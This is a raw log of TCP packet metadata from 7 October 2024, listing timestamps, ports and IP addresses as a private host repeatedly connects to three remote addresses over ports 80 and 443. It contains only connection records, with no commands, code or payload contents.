Oct 7, 2024 14:52:26.326929092 CEST	443	49762	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.327153921 CEST	49762	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.327433109 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.327737093 CEST	49762	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.328260899 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.328363895 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.331037998 CEST	49754	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.332151890 CEST	49769	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.336218119 CEST	80	49754	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.336268902 CEST	49754	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.337260008 CEST	80	49769	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.337443113 CEST	49769	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.337510109 CEST	49769	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.342271090 CEST	80	49769	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.616095066 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.616178989 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.618279934 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.618295908 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.618588924 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.679740906 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.727402925 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.799231052 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.799635887 CEST	443	49768	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:26.799699068 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.802819014 CEST	49768	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:26.806149006 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:26.810969114 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:26.990237951 CEST	80	49769	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.010426998 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.011528015 CEST	49775	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.011598110 CEST	443	49775	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.011665106 CEST	49775	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.011938095 CEST	49775	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.011976004 CEST	443	49775	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.014014959 CEST	49776	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.014056921 CEST	443	49776	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.014121056 CEST	49776	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.014461994 CEST	49776	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.014480114 CEST	443	49776	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.030292034 CEST	49769	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.061563015 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.492234945 CEST	443	49776	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.494260073 CEST	49776	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.494276047 CEST	443	49776	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.495192051 CEST	443	49775	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.496596098 CEST	49775	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.496611118 CEST	443	49775	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.624358892 CEST	443	49776	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.624598980 CEST	443	49776	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.624742031 CEST	49776	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.625108957 CEST	49776	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.627551079 CEST	443	49775	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.627638102 CEST	443	49775	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:27.627728939 CEST	49775	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.627984047 CEST	49775	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:27.631294966 CEST	49769	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.632237911 CEST	49782	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.632819891 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.633769035 CEST	49783	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.636471987 CEST	80	49769	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.636535883 CEST	49769	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.637442112 CEST	80	49782	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.637531996 CEST	49782	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.637656927 CEST	49782	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.638436079 CEST	80	49758	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.638513088 CEST	49758	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.638775110 CEST	80	49783	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.639215946 CEST	49783	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.639215946 CEST	49783	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:27.642595053 CEST	80	49782	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:27.644020081 CEST	80	49783	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:28.292773008 CEST	80	49782	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:28.294418097 CEST	49788	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.294440031 CEST	443	49788	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.295672894 CEST	49788	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.296044111 CEST	49788	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.296055079 CEST	443	49788	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.342791080 CEST	49782	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.383421898 CEST	80	49783	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:28.388209105 CEST	49790	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.388324976 CEST	443	49790	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.388442039 CEST	49790	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.388840914 CEST	49790	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.388880014 CEST	443	49790	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.436531067 CEST	49783	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.762404919 CEST	443	49788	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.764272928 CEST	49788	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.764296055 CEST	443	49788	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.863835096 CEST	443	49790	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.865581036 CEST	49790	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.865675926 CEST	443	49790	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.907440901 CEST	443	49788	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.907505035 CEST	443	49788	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:28.907650948 CEST	49788	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.908015013 CEST	49788	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:28.911009073 CEST	49782	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.912164927 CEST	49791	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.916290045 CEST	80	49782	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:28.916354895 CEST	49782	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.916928053 CEST	80	49791	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:28.917067051 CEST	49791	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.917120934 CEST	49791	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:28.922333002 CEST	80	49791	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:29.036838055 CEST	443	49790	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:29.036911011 CEST	443	49790	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:29.036986113 CEST	49790	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.037425041 CEST	49790	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.042093992 CEST	49796	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:29.042541981 CEST	49783	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:29.047374010 CEST	80	49796	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:29.047461033 CEST	49796	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:29.047697067 CEST	49796	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:29.049786091 CEST	80	49783	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:29.049995899 CEST	49783	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:29.052917957 CEST	80	49796	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:29.610243082 CEST	80	49791	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:29.613284111 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.613329887 CEST	443	49798	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:29.613403082 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.613778114 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.613795996 CEST	443	49798	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:29.655323029 CEST	49791	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:29.719218016 CEST	80	49796	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:29.725585938 CEST	49800	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.725635052 CEST	443	49800	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:29.725684881 CEST	49800	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.725984097 CEST	49800	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:29.726001978 CEST	443	49800	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:29.764691114 CEST	49796	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.063359976 CEST	443	49798	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.109220982 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.123410940 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.123420954 CEST	443	49798	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.193424940 CEST	443	49800	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.225161076 CEST	49800	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.225208044 CEST	443	49800	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.226540089 CEST	443	49798	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.227199078 CEST	443	49798	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.227351904 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.228224039 CEST	49798	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.232122898 CEST	49791	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.233087063 CEST	49805	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.237766981 CEST	80	49791	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:30.238074064 CEST	49791	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.238621950 CEST	80	49805	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:30.238686085 CEST	49805	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.238791943 CEST	49805	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.243746042 CEST	80	49805	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:30.327826977 CEST	443	49800	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.328056097 CEST	443	49800	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.328214884 CEST	49800	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.345957994 CEST	49800	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.352341890 CEST	49806	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.358329058 CEST	80	49806	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:30.358520985 CEST	49806	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.359100103 CEST	49806	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:30.365039110 CEST	80	49806	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:30.883985996 CEST	80	49805	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:30.885129929 CEST	49812	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.885179996 CEST	443	49812	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.885246038 CEST	49812	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.885469913 CEST	49812	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:30.885481119 CEST	443	49812	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:30.936541080 CEST	49805	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.007693052 CEST	80	49806	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:31.009294033 CEST	49813	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.009341002 CEST	443	49813	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.009413958 CEST	49813	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.009640932 CEST	49813	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.009655952 CEST	443	49813	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.061562061 CEST	49806	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.397511959 CEST	443	49812	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.399612904 CEST	49812	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.399636030 CEST	443	49812	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.502896070 CEST	443	49813	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.505546093 CEST	49813	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.505575895 CEST	443	49813	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.531491995 CEST	443	49812	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.531714916 CEST	443	49812	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.531776905 CEST	49812	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.533046961 CEST	49812	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.539475918 CEST	49805	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.540693998 CEST	49818	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.544926882 CEST	80	49805	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:31.544980049 CEST	49805	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.545815945 CEST	80	49818	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:31.545880079 CEST	49818	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.547729969 CEST	49818	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.552551985 CEST	80	49818	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:31.666218042 CEST	443	49813	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.666287899 CEST	443	49813	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:31.666337013 CEST	49813	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.667571068 CEST	49813	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:31.671422005 CEST	49806	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.672399044 CEST	49819	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.676592112 CEST	80	49806	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:31.676640034 CEST	49806	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.677400112 CEST	80	49819	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:31.677453995 CEST	49819	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.677540064 CEST	49819	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:31.682775021 CEST	80	49819	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:32.190016985 CEST	80	49818	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:32.198117018 CEST	49823	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.198147058 CEST	443	49823	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.198221922 CEST	49823	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.198544025 CEST	49823	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.198554993 CEST	443	49823	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.233428955 CEST	49818	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:32.351125956 CEST	80	49819	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:32.352626085 CEST	49826	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.352708101 CEST	443	49826	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.352823973 CEST	49826	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.353112936 CEST	49826	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.353141069 CEST	443	49826	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.405306101 CEST	49819	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:32.634907961 CEST	443	49823	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.636728048 CEST	49823	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.636760950 CEST	443	49823	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.788690090 CEST	443	49823	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.788916111 CEST	443	49823	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.788984060 CEST	49823	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.789338112 CEST	49823	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.806042910 CEST	49818	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:32.811403036 CEST	80	49818	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:32.811477900 CEST	49818	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:32.815346003 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:32.815428972 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:32.815692902 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:32.816346884 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:32.816371918 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:32.821026087 CEST	443	49826	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:32.822823048 CEST	49826	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:32.822880983 CEST	443	49826	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:33.142035007 CEST	443	49826	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:33.142261028 CEST	443	49826	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:33.142313957 CEST	49826	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:33.306745052 CEST	49826	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:33.451596975 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:33.451726913 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:33.493256092 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:33.493285894 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:33.494096994 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:33.495682955 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:33.502156973 CEST	49819	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:33.503945112 CEST	49834	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:33.507455111 CEST	80	49819	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:33.507534981 CEST	49819	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:33.508861065 CEST	80	49834	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:33.508930922 CEST	49834	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:33.509063959 CEST	49834	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:33.513861895 CEST	80	49834	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:33.543431997 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:33.710601091 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:33.710762978 CEST	443	49828	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:33.710820913 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:33.715301991 CEST	49828	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:34.161607981 CEST	80	49834	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:34.163330078 CEST	49839	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:34.163356066 CEST	443	49839	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:34.163506985 CEST	49839	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:34.163724899 CEST	49839	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:34.163737059 CEST	443	49839	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:34.202261925 CEST	49834	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:34.606904030 CEST	443	49839	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:34.610533953 CEST	49839	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:34.610574007 CEST	443	49839	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:34.760921955 CEST	443	49839	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:34.761049986 CEST	443	49839	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:34.761267900 CEST	49839	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:34.761807919 CEST	49839	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:34.780466080 CEST	49834	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:34.781367064 CEST	49844	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:34.785653114 CEST	80	49834	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:34.785706997 CEST	49834	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:34.786151886 CEST	80	49844	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:34.786206961 CEST	49844	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:34.786511898 CEST	49844	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:34.791372061 CEST	80	49844	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:35.449213982 CEST	80	49844	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:35.450678110 CEST	49850	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:35.450726032 CEST	443	49850	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:35.450844049 CEST	49850	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:35.451415062 CEST	49850	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:35.451426983 CEST	443	49850	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:35.499057055 CEST	49844	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:35.894838095 CEST	443	49850	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:35.896743059 CEST	49850	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:35.896773100 CEST	443	49850	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:36.041136026 CEST	443	49850	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:36.041198969 CEST	443	49850	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:36.041325092 CEST	49850	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:36.124612093 CEST	49850	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:36.517879009 CEST	49844	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:36.523034096 CEST	80	49844	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:36.523086071 CEST	49844	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:36.552664042 CEST	49862	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:36.557508945 CEST	80	49862	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:36.557615995 CEST	49862	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:36.561764956 CEST	49862	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:36.566574097 CEST	80	49862	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:37.248243093 CEST	80	49862	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:37.250086069 CEST	49868	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:37.250122070 CEST	443	49868	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:37.250195026 CEST	49868	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:37.253122091 CEST	49868	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:37.253149033 CEST	443	49868	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:37.296005964 CEST	49862	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:37.712558985 CEST	443	49868	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:37.724905968 CEST	49868	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:37.724936008 CEST	443	49868	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:37.858125925 CEST	443	49868	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:37.858366013 CEST	443	49868	188.114.96.3	192.168.2.7
Oct 7, 2024 14:52:37.858477116 CEST	49868	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:37.859091997 CEST	49868	443	192.168.2.7	188.114.96.3
Oct 7, 2024 14:52:37.917593956 CEST	49862	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:37.918299913 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:37.918335915 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:37.918396950 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:37.919157982 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:37.919172049 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:37.922775030 CEST	80	49862	132.226.247.73	192.168.2.7
Oct 7, 2024 14:52:37.922831059 CEST	49862	80	192.168.2.7	132.226.247.73
Oct 7, 2024 14:52:38.544433117 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:38.544759035 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:38.547406912 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:38.547416925 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:38.547668934 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:38.549069881 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:38.595408916 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:38.826586008 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:38.826651096 CEST	443	49871	149.154.167.220	192.168.2.7
Oct 7, 2024 14:52:38.826793909 CEST	49871	443	192.168.2.7	149.154.167.220
Oct 7, 2024 14:52:38.841393948 CEST	49871	443	192.168.2.7	149.154.167.220
